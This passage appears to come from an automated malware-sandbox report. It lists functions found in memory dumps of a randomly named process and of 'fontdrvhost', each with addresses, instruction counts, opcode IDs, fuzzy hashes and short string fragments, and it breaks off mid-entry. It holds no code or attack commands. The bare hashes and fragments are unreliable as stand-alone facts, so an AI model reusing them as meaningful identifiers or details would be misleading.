                                                                                            • Instruction ID: 0903c0f5ba1aea84b8374220c3e8458ace536c3b552ab644ccd694cc74ec42c3
                                                                                            • Opcode Fuzzy Hash: 0826c224078c63c4f3aba3685551064d474c94568def339aeceeffc94d93cf9b
                                                                                            • Instruction Fuzzy Hash: F0E04F7192891E4FDB85FFA8D8455FDB7A2FB88740F004139D10DE3152CE206804C780

                                                                                            Non-executed Functions

                                                                                            Function 00007FFB4B2B57F2 Relevance: 6.5, Strings: 5, Instructions: 239COMMON
                                                                                            Download Yara Rule
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000036.00000002.2169959698.00007FFB4B2B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4B2B0000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_54_2_7ffb4b2b0000_BQrPGmkzolSuiSkMAkyslxsiiFSSM.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID: 0O5K$@O5K$PO5K$`O5K$pP5K
                                                                                            • API String ID: 0-3199577557
                                                                                            • Opcode ID: d97265bf3991bb9e2f9173a16b3ba7b75b1288842f016ceb3c8eb23be179837f
                                                                                            • Instruction ID: 2f2e78d1dff202e3f2f14410f5f34d8a96a914f67c5a2c1c9411bebfafc19932
                                                                                            • Opcode Fuzzy Hash: d97265bf3991bb9e2f9173a16b3ba7b75b1288842f016ceb3c8eb23be179837f
                                                                                            • Instruction Fuzzy Hash: D8512E8770D6D20BE3167AFCFC621E97F50EF822F134941BBD288CA0ABAC15554A42D1

                                                                                            Executed Functions

                                                                                            Function 00007FFB4B281EC3 Relevance: 15.3, Strings: 11, Instructions: 1538COMMON
                                                                                            Download Yara Rule
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000037.00000002.2257436617.00007FFB4B280000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4B280000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_55_2_7ffb4b280000_fontdrvhost.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID: "$[$[$\$]$]$u${${$}$}
                                                                                            • API String ID: 0-3490533229
                                                                                            • Opcode ID: e4c48e977701bbcc345060474cda2b3731c5d715991fb53583c66935480813e2
                                                                                            • Instruction ID: 5c41ad22ddb391a1874dbb39d70b1849401a1975d184959c217f4ba636bf430d
                                                                                            • Opcode Fuzzy Hash: e4c48e977701bbcc345060474cda2b3731c5d715991fb53583c66935480813e2
                                                                                            • Instruction Fuzzy Hash: 6ED2C7B0D196298FDBA9EF28C8947E9B7B1FF58301F1041E9D40DE7291CA35AA81CF54
                                                                                            Function 00007FFB4B281250 Relevance: 1.5, Strings: 1, Instructions: 276COMMON
                                                                                            Download Yara Rule
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000037.00000002.2257436617.00007FFB4B280000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4B280000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_55_2_7ffb4b280000_fontdrvhost.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID: 0-3916222277
                                                                                            • Opcode ID: 890614be176a45f18a9dd724c5ca8fb6d3c3b97b8c1458c96c92143b403d1e2d
                                                                                            • Instruction ID: 142136c788e1987ccf6bde00530b56762e141914ed3d61cedfd2277d28c37c66
                                                                                            • Opcode Fuzzy Hash: 890614be176a45f18a9dd724c5ca8fb6d3c3b97b8c1458c96c92143b403d1e2d
                                                                                            • Instruction Fuzzy Hash: 7FA18274A18A1C8FDB94EF58C894BA8BBF1FF69301F4541A9D00DE72A5CB74AC81CB41
                                                                                            Function 00007FFB4B283A8D Relevance: 1.3, Strings: 1, Instructions: 84COMMON
                                                                                            Download Yara Rule
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000037.00000002.2257436617.00007FFB4B280000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4B280000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_55_2_7ffb4b280000_fontdrvhost.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID: H#2K
                                                                                            • API String ID: 0-1234279198
                                                                                            • Opcode ID: db6130975480fcee3ba1f96522566c5bbf2f05421b593adbf76a799e90e11813
                                                                                            • Instruction ID: 2eca36f3c5f5210a8a8b6426d062a91148c42d8fe8dd19d0c4f97bfe5a41ecfb
                                                                                            • Opcode Fuzzy Hash: db6130975480fcee3ba1f96522566c5bbf2f05421b593adbf76a799e90e11813
                                                                                            • Instruction Fuzzy Hash: 3521D6B190D68A4FEB95FE38C8656EABBA1FF45300F0441F9D14CC71A2DA79A841C710
                                                                                            Function 00007FFB4B281751 Relevance: .4, Instructions: 401COMMON
                                                                                            Download Yara Rule
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000037.00000002.2257436617.00007FFB4B280000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4B280000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_55_2_7ffb4b280000_fontdrvhost.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: 866f7ed17c38aa6e6aba87f66337ae3782e2f6158751cda70451276e6235348e
                                                                                            • Instruction ID: bf24950a924585283a59ac773f72a9873f348d95e4ec096df3d3f9b3091fcb0c
                                                                                            • Opcode Fuzzy Hash: 866f7ed17c38aa6e6aba87f66337ae3782e2f6158751cda70451276e6235348e
                                                                                            • Instruction Fuzzy Hash: 55E18FB1D196598FDB99EF64C8957E8BBF1EF48301F0441BAD04DE72D2CA38A881CB51
                                                                                            Function 00007FFB4B284843 Relevance: .2, Instructions: 249COMMON
                                                                                            Download Yara Rule
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000037.00000002.2257436617.00007FFB4B280000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4B280000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_55_2_7ffb4b280000_fontdrvhost.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: 9296325d50dcb8db47c5ff6f1ce6c70ee7da2a35cbd189a497d4921de1093c06
                                                                                            • Instruction ID: 2c45622e39ac266e67c8c00b4fcecc2283186b9746a226740c8b9f9cb4c41729
                                                                                            • Opcode Fuzzy Hash: 9296325d50dcb8db47c5ff6f1ce6c70ee7da2a35cbd189a497d4921de1093c06
                                                                                            • Instruction Fuzzy Hash: EE91E470D18A1D8FDB95EFA8C8957EDBBB1FF58301F1052AAD40DE3252DB34A9858B40
                                                                                            Function 00007FFB4B281831 Relevance: .2, Instructions: 246COMMON
                                                                                            Download Yara Rule
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000037.00000002.2257436617.00007FFB4B280000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4B280000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_55_2_7ffb4b280000_fontdrvhost.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: f7bfdce2cef63f1217ef0f7358b2e2848394556078916d15e94715046027a228
                                                                                            • Instruction ID: 30ab0529259ffab6bf5347f3aff035ed4a796e44fb5be33bd0238d97d7caba75
                                                                                            • Opcode Fuzzy Hash: f7bfdce2cef63f1217ef0f7358b2e2848394556078916d15e94715046027a228
                                                                                            • Instruction Fuzzy Hash: 80913CB1D1865D8FEB99EF68C4957A8BBE1FF58301F0441B9D00DE7292CE38A881CB41
                                                                                            Function 00007FFB4B280DD9 Relevance: .2, Instructions: 214COMMON
                                                                                            Download Yara Rule
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000037.00000002.2257436617.00007FFB4B280000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4B280000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_55_2_7ffb4b280000_fontdrvhost.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: 72af19f9c86e1fe52d2cbc95c5d0d2e3c5c6cf22f25ea87a918e9f6012270bac
                                                                                            • Instruction ID: 032cbc3d29edc08e307b42ef107a23478f58a527cacf888c5073a706e9f31116
                                                                                            • Opcode Fuzzy Hash: 72af19f9c86e1fe52d2cbc95c5d0d2e3c5c6cf22f25ea87a918e9f6012270bac
                                                                                            • Instruction Fuzzy Hash: 1A711F7191894E8FDF85FF68C495AEAB7B1FF58300F1446A5D409D7296CA34E882CB90
                                                                                            Function 00007FFB4B2808B1 Relevance: .2, Instructions: 210COMMON
                                                                                            Download Yara Rule
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000037.00000002.2257436617.00007FFB4B280000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4B280000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_55_2_7ffb4b280000_fontdrvhost.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: 15e5deeba854f63ed72fb47edde9ff02ac624b656cce5e1b399d784e1e188815
                                                                                            • Instruction ID: 7817f79b0b4c7e5d985c16eccfe9c84f246b594ada9eb90ced1abbe9e9396395
                                                                                            • Opcode Fuzzy Hash: 15e5deeba854f63ed72fb47edde9ff02ac624b656cce5e1b399d784e1e188815
                                                                                            • Instruction Fuzzy Hash: 4F6190B190CA4E8FEF94FF78C8546EA7BA1FF59301F4442BAD409D71A2DA35A841C750
                                                                                            Function 00007FFB4B284F5C Relevance: .2, Instructions: 193COMMON
                                                                                            Download Yara Rule
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000037.00000002.2257436617.00007FFB4B280000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4B280000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_55_2_7ffb4b280000_fontdrvhost.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: 2d2e4b6830af405b3a8c0bbc7cd39042da14f914404465478d6ed25b61286b57
                                                                                            • Instruction ID: 681b59ac1ae403ec4b2413992f99926f72802448c3b63f64fc740a70073b6a7d
                                                                                            • Opcode Fuzzy Hash: 2d2e4b6830af405b3a8c0bbc7cd39042da14f914404465478d6ed25b61286b57
                                                                                            • Instruction Fuzzy Hash: 7971D670D0992D8FDBA5EF58C895BE9BBF1FB58301F5002AAD40DE7251DB35AA84CB40
                                                                                            Function 00007FFB4B2860C5 Relevance: .2, Instructions: 183COMMON
                                                                                            Download Yara Rule
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000037.00000002.2257436617.00007FFB4B280000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4B280000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_55_2_7ffb4b280000_fontdrvhost.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: 5431a5914d10fe31aa978f36a7e60b53d8b4bd0d191748d7bd2d153b85b7a7bb
                                                                                            • Instruction ID: 46a98ca73d698d67f4890d3a2a84d21a8c3818713c3d7809003d2af5cf95dd0d
                                                                                            • Opcode Fuzzy Hash: 5431a5914d10fe31aa978f36a7e60b53d8b4bd0d191748d7bd2d153b85b7a7bb
                                                                                            • Instruction Fuzzy Hash: B561BFB1D0C6598FEB96FF68C5553A9BFB1FF45300F4086BAC009D7292DA389985CB41
                                                                                            Function 00007FFB4B284611 Relevance: .2, Instructions: 171COMMON
                                                                                            Download Yara Rule
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000037.00000002.2257436617.00007FFB4B280000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4B280000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_55_2_7ffb4b280000_fontdrvhost.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: afa7eda03581f2b322c281b0bdea7e91f9cd47a54b1f0768dfd1488262001df4
                                                                                            • Instruction ID: 0477feab1f2216d17aac563bfd6a6886bd871a2dd77549575fb41669b64a689e
                                                                                            • Opcode Fuzzy Hash: afa7eda03581f2b322c281b0bdea7e91f9cd47a54b1f0768dfd1488262001df4
                                                                                            • Instruction Fuzzy Hash: FD51A5B0D18A1D8FDF94EFA8D855BADBBB1FF58301F104169D409E7291CA74A881CB50
                                                                                            Function 00007FFB4B280AB9 Relevance: .2, Instructions: 157COMMON
                                                                                            Download Yara Rule
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000037.00000002.2257436617.00007FFB4B280000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4B280000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_55_2_7ffb4b280000_fontdrvhost.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: 7beddf8a2220730279c3835ce2d9c031b672d3ec22fe5bb68d77feff771a9e08
                                                                                            • Instruction ID: c8148270d9130bab70dcbc251d01f981ec3d743f381a7b2e351c8286e22ea553
                                                                                            • Opcode Fuzzy Hash: 7beddf8a2220730279c3835ce2d9c031b672d3ec22fe5bb68d77feff771a9e08
                                                                                            • Instruction Fuzzy Hash: 4351ECB0D18A5D8FDF94EFA8C8546EDBBB2FF58311F14422AD409E72A5CB349845CB50
                                                                                            Function 00007FFB4B2838B8 Relevance: .2, Instructions: 151COMMON
                                                                                            Download Yara Rule
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000037.00000002.2257436617.00007FFB4B280000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4B280000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_55_2_7ffb4b280000_fontdrvhost.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: 59ccbcb7688b33b6bf0f66c0c96c5d63c953cc5341e60d06d187e624bcbb404c
                                                                                            • Instruction ID: 4ac46de20d726826bb31af9f257ea2dc8772347e88f1de527215d16ad3b7195e
                                                                                            • Opcode Fuzzy Hash: 59ccbcb7688b33b6bf0f66c0c96c5d63c953cc5341e60d06d187e624bcbb404c
                                                                                            • Instruction Fuzzy Hash: 8D419CB0A1891D8FDF45EFA8D845AEEBBB1FF58300F10067AE409E7295DA34A9018B51
                                                                                            Function 00007FFB4B2867ED Relevance: .1, Instructions: 142COMMON
                                                                                            Download Yara Rule
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000037.00000002.2257436617.00007FFB4B280000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4B280000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_55_2_7ffb4b280000_fontdrvhost.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: ab642320170400448025e4c598893dc2dd5fe2e6a843964279b204f80191fd27
                                                                                            • Instruction ID: 0c98d08dc12695e2ad226d06053a12189b7500a3040cc2be381f5550cd0928bf
                                                                                            • Opcode Fuzzy Hash: ab642320170400448025e4c598893dc2dd5fe2e6a843964279b204f80191fd27
                                                                                            • Instruction Fuzzy Hash: 24519B7180D2898FDB46AF74D8552FE7FB0EF06300F0549BAD408E61A2DA389A48CB52
                                                                                            Function 00007FFB4B280C6D Relevance: .1, Instructions: 125COMMON
                                                                                            Download Yara Rule
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000037.00000002.2257436617.00007FFB4B280000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4B280000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_55_2_7ffb4b280000_fontdrvhost.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: b3e7176e47d0a8603f6ed2811cc8679ae0b4f111a998f1189d10a3940135c857
                                                                                            • Instruction ID: 7182ee8ecb039ae30abfb1a9b481999e87b73da5bf520d501a5bed8f7d07f838
                                                                                            • Opcode Fuzzy Hash: b3e7176e47d0a8603f6ed2811cc8679ae0b4f111a998f1189d10a3940135c857
                                                                                            • Instruction Fuzzy Hash: BE412671C0961D8EDB51EFB4D4496EEBBB1FF19300F50067AD409E3192DA78A985CB90
                                                                                            Function 00007FFB4B281521 Relevance: .1, Instructions: 120COMMON
                                                                                            Download Yara Rule
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000037.00000002.2257436617.00007FFB4B280000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4B280000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_55_2_7ffb4b280000_fontdrvhost.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: a4be1818ceca666d54fdec2a3872d00869feacd842fc3e8eb6223d1b531b10d5
                                                                                            • Instruction ID: aac49f2463b9a919cad4a68e746cba3062307849a235c5548d323ed21572c536
                                                                                            • Opcode Fuzzy Hash: a4be1818ceca666d54fdec2a3872d00869feacd842fc3e8eb6223d1b531b10d5
                                                                                            • Instruction Fuzzy Hash: F341E874A1891D8FDF98EF68C895BACB7F1FF58305F5481A9D04EE3291CE74A8818B40
                                                                                            Function 00007FFB4B280AD0 Relevance: .1, Instructions: 111COMMON
                                                                                            Download Yara Rule
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000037.00000002.2257436617.00007FFB4B280000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4B280000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_55_2_7ffb4b280000_fontdrvhost.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: 5ec6c34be66fb8960c3c8fee7e8f479a16c4ff8e5ea828788bfe5f8d0faef91b
                                                                                            • Instruction ID: 6fad060e8873d4bedb7bb319602716f4aecdffa544340601d8d0da2a4b446a9c
                                                                                            • Opcode Fuzzy Hash: 5ec6c34be66fb8960c3c8fee7e8f479a16c4ff8e5ea828788bfe5f8d0faef91b
                                                                                            • Instruction Fuzzy Hash: 6F31ED7091891D8FDF94EF68C855AEEBBB2FF98311F104229D409E32A5CB34A855CB90
                                                                                            Function 00007FFB4B284BE9 Relevance: .1, Instructions: 103COMMON
                                                                                            Download Yara Rule
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000037.00000002.2257436617.00007FFB4B280000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4B280000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_55_2_7ffb4b280000_fontdrvhost.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: bf5152d9ccfb065b65e5390152390fc7ddbb997f8cc84f9047349a565678b16c
                                                                                            • Instruction ID: a69d66d006301ba2ad2336d42c926cde11091a57eadb2d13574d7311e894e452
                                                                                            • Opcode Fuzzy Hash: bf5152d9ccfb065b65e5390152390fc7ddbb997f8cc84f9047349a565678b16c
                                                                                            • Instruction Fuzzy Hash: 7F418DB0D096598FEB46EFB4C8496EDBBB2FF55301F4041BAD009D72A2CB389881CB40
                                                                                            Function 00007FFB4B284535 Relevance: .1, Instructions: 98COMMON
                                                                                            Download Yara Rule
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000037.00000002.2257436617.00007FFB4B280000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4B280000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_55_2_7ffb4b280000_fontdrvhost.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: 3783cf3d99c449fa4b3a99341bf703f5a7cff2519b8ce548b84837d2ed94aeae
                                                                                            • Instruction ID: ae939119811d0eb5a7be942589050538066e4dd902e682361e4607592010aae2
                                                                                            • Opcode Fuzzy Hash: 3783cf3d99c449fa4b3a99341bf703f5a7cff2519b8ce548b84837d2ed94aeae
                                                                                            • Instruction Fuzzy Hash: 6431D9A181DACA4FD751EF3CC8251E97FA0FF56254F4542B6EC88C6193DB289845C391
                                                                                            Function 00007FFB4B281129 Relevance: .1, Instructions: 90COMMON
                                                                                            Download Yara Rule
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000037.00000002.2257436617.00007FFB4B280000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4B280000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_55_2_7ffb4b280000_fontdrvhost.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: 84e106850460006aa32d2dbc5c10f928a883d0d308d59269548054a9907dbfcf
                                                                                            • Instruction ID: 5e2eef29870364f21ad943440356176bb4fa14e5bf338ffe7816be569d0563de
                                                                                            • Opcode Fuzzy Hash: 84e106850460006aa32d2dbc5c10f928a883d0d308d59269548054a9907dbfcf
                                                                                            • Instruction Fuzzy Hash: 65218B71908A5D8FDF81EF68D845AEDBBF1FF58311F00417AE408E32A2CA34A951CB90
                                                                                            Function 00007FFB4B283F00 Relevance: .1, Instructions: 85COMMON
                                                                                            Download Yara Rule
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000037.00000002.2257436617.00007FFB4B280000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4B280000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_55_2_7ffb4b280000_fontdrvhost.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: 6224d6fe547f9e6ee1d0a611e5bd07045049fa10629408a94964142f94ffab21
                                                                                            • Instruction ID: 3ee0fe6058a4f7d83d517c74a09c84bb4351fb64634073652bf4e189708dfffd
                                                                                            • Opcode Fuzzy Hash: 6224d6fe547f9e6ee1d0a611e5bd07045049fa10629408a94964142f94ffab21
                                                                                            • Instruction Fuzzy Hash: 08315E70D0960A8BEB69FF34C5593BAB7A1EF54300F1055B9D55DD32E2CE34A981CB40
                                                                                            Function 00007FFB4B283F0B Relevance: .1, Instructions: 77COMMON
                                                                                            Download Yara Rule
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000037.00000002.2257436617.00007FFB4B280000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4B280000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_55_2_7ffb4b280000_fontdrvhost.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: 517acce97881f069d1cb4e152de2a99cac4082ea86a2d178fdd2817b98298f69
                                                                                            • Instruction ID: 897ce8d4c8a063b95ddb343e2eb4bd7272bba9fa8ade35108a64aff07251c5b2
                                                                                            • Opcode Fuzzy Hash: 517acce97881f069d1cb4e152de2a99cac4082ea86a2d178fdd2817b98298f69
                                                                                            • Instruction Fuzzy Hash: CC21A1B1D0D60A8BEB68BF74C5456BA7BB1EF94300F105179E61E932E2DE38E941CA40
                                                                                            Function 00007FFB4B281048 Relevance: .1, Instructions: 74COMMON
                                                                                            Download Yara Rule
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000037.00000002.2257436617.00007FFB4B280000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4B280000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_55_2_7ffb4b280000_fontdrvhost.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: 0898e84e75e8ad42cc265afa24bc8fe03e6871a79d9db3020a86d83d63d3d85d
                                                                                            • Instruction ID: 953528d8bfc0c751650c31542f1020e651adb7d10d48d8ae66f0ddb8f2810e1d
                                                                                            • Opcode Fuzzy Hash: 0898e84e75e8ad42cc265afa24bc8fe03e6871a79d9db3020a86d83d63d3d85d
                                                                                            • Instruction Fuzzy Hash: 74219274A1891D8FDF84EF98D495EEEBBB1FF6C301F104169E509E3255CA34E8418B90
                                                                                            Function 00007FFB4B283F43 Relevance: .1, Instructions: 71COMMON
                                                                                            Download Yara Rule
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000037.00000002.2257436617.00007FFB4B280000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4B280000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_55_2_7ffb4b280000_fontdrvhost.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: 76f52d4e35136a2e70a8913239302bb47856962212608f988809e234f9f6b9eb
                                                                                            • Instruction ID: ebd7c10339103d2af5be6a80951b799cf1062b2d438fcbfb85267fb269746ce6
                                                                                            • Opcode Fuzzy Hash: 76f52d4e35136a2e70a8913239302bb47856962212608f988809e234f9f6b9eb
                                                                                            • Instruction Fuzzy Hash: 8221797090EB498FEB69AF38C8197BA7BB0EF45310F0401BAD409D72A2CE3898458B51
                                                                                            Function 00007FFB4B283FC1 Relevance: .1, Instructions: 64COMMON
                                                                                            Download Yara Rule
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000037.00000002.2257436617.00007FFB4B280000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4B280000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_55_2_7ffb4b280000_fontdrvhost.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: f84a6405020f046cb537c2c1b41b84530eca86442429a29d2f8949efb65fb62d
                                                                                            • Instruction ID: 3fa3e74c460e0d860d167049a8fa28147ce4cd5e28782b1f8076926748c3a4dd
                                                                                            • Opcode Fuzzy Hash: f84a6405020f046cb537c2c1b41b84530eca86442429a29d2f8949efb65fb62d
                                                                                            • Instruction Fuzzy Hash: F4117CB090E78A4FEB6AAF74C8157BA7FB1AF86310F0840BAD449D72D3CD689845C751
                                                                                            Function 00007FFB4B283F62 Relevance: .1, Instructions: 63COMMON
                                                                                            Download Yara Rule
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000037.00000002.2257436617.00007FFB4B280000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4B280000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_55_2_7ffb4b280000_fontdrvhost.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: ac7658f7cf3f340861f10924817d20de5cb095b6c4d5519cf8968b92ee94994e
                                                                                            • Instruction ID: b84d152275ac11be69016132264daeecc6860e2f487d4eab7e3a7f86efed1cc9
                                                                                            • Opcode Fuzzy Hash: ac7658f7cf3f340861f10924817d20de5cb095b6c4d5519cf8968b92ee94994e
                                                                                            • Instruction Fuzzy Hash: EC11A770D0D60E8BEB68FE38C5057BA7AF1EF95310F045679E51ED32E2DE38A8058681
                                                                                            Function 00007FFB4B283F86 Relevance: .1, Instructions: 59COMMON
                                                                                            Download Yara Rule
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000037.00000002.2257436617.00007FFB4B280000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4B280000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_55_2_7ffb4b280000_fontdrvhost.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: 16ac39a27c230182b602e2bf224ae4e8d0b5623b04d47383c580120bc13884d2
                                                                                            • Instruction ID: 6e7498da621e3dced8846724fc5e94092027a7dadc310515f2a75c1d8dba9f7f
                                                                                            • Opcode Fuzzy Hash: 16ac39a27c230182b602e2bf224ae4e8d0b5623b04d47383c580120bc13884d2
                                                                                            • Instruction Fuzzy Hash: E01182B0D0D64A8BEBA9FF38C5053BA7AA1EF94300F145579E51D936E2CE39E841C744
                                                                                            Function 00007FFB4B283EEC Relevance: .1, Instructions: 56COMMON
                                                                                            Download Yara Rule
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000037.00000002.2257436617.00007FFB4B280000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4B280000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_55_2_7ffb4b280000_fontdrvhost.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
